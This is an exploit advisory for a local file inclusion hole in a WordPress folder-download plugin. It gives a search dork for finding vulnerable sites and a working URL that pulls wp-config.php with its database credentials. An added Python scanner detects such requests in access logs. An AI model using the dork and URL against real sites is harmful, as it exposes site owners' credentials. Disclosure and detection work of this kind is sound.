WordPress CIP4 Folder Download plugin version 1.10 suffers from a local file inclusion vulnerability.
# Exploit Title: CIP4 Folder Download Widget LFI
# Google Dork: index of :/cip4-folder-download-widget
# Date: 13-01-2015
# Exploit Author: Ben khlifa Fahmi (XTnR3v0lt)
# Vendor Homepage: https://community.cip4.org
# Software Link: https://wordpress.org/plugins/cip4-folder-download-widget/
# Version: 1.10
# Tested on: Ubuntu 14.04
Dork :
inurl:/wp-content/plugins/cip4-folder-download-widget/
Exploit :
https://localhost/[wordpress]/wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=wp-config.php&info=wp-config.php
Ben khlifa Fahmi - Founder & CEO of Tunisian Cyber Army
Greetz to : Joseph - Michou - hackerXben - RaisoMos - Lola - All muslim hackers world wide
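A log check for requests shaped like the proof-of-concept URL above, as an added example that is not part of the original advisory. The script path and the `target` and `info` parameter names come from that URL; the pattern of sensitive values, the Combined Log Format assumption and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script path and parameter names come from the PoC URL in the advisory.
VULN_SCRIPT = "/wp-content/plugins/cip4-folder-download-widget/cip4-download.php"
PARAMS = ("target", "info")
# Assumed heuristic: values a download of a published file should never carry.
SENSITIVE = re.compile(r"(\.\./|\.\.\\|^/|wp-config|\.php$|\.htaccess|/etc/)", re.I)
# Assumes Combined Log Format: ip ... "METHOD URI PROTOCOL" status size
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def suspicious_values(uri):
    """Return (parameter, decoded value) pairs that look like file-disclosure attempts."""
    parts = urlsplit(uri)
    if not unquote(parts.path).lower().endswith(VULN_SCRIPT):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)  # decodes once
    hits = []
    for name in PARAMS:
        for value in query.get(name, []):
            decoded = unquote(value)  # second decode catches double encoding
            if SENSITIVE.search(decoded):
                hits.append((name, decoded))
    return hits

def scan(lines):
    """Return one finding per log line that requests the script with a suspicious value."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        hits = suspicious_values(m["uri"]) if m else []
        if hits:
            findings.append({"ip": m["ip"], "status": int(m["status"]), "hits": hits})
    return findings

# Constructed sample access-log lines (documentation IP ranges, made-up sizes).
SAMPLE_LOG = [
    f'203.0.113.7 - - [13/Jan/2015:10:01:02 +0000] "GET /blog{VULN_SCRIPT}?target=wp-config.php&info=wp-config.php HTTP/1.1" 200 3120',
    f'198.51.100.4 - - [13/Jan/2015:10:02:10 +0000] "GET /blog{VULN_SCRIPT}?target=%252e%252e%252fwp-config.php&info=x HTTP/1.1" 404 210',
    f'192.0.2.9 - - [13/Jan/2015:10:03:00 +0000] "GET /blog{VULN_SCRIPT}?target=brochure.pdf&info=brochure.pdf HTTP/1.1" 200 88231',
    '192.0.2.9 - - [13/Jan/2015:10:03:05 +0000] "GET /blog/?s=wp-config.php HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with status 200 deserves the most attention, since the response body may have contained the requested file; in that case rotate the database credentials and the keys and salts stored in `wp-config.php`.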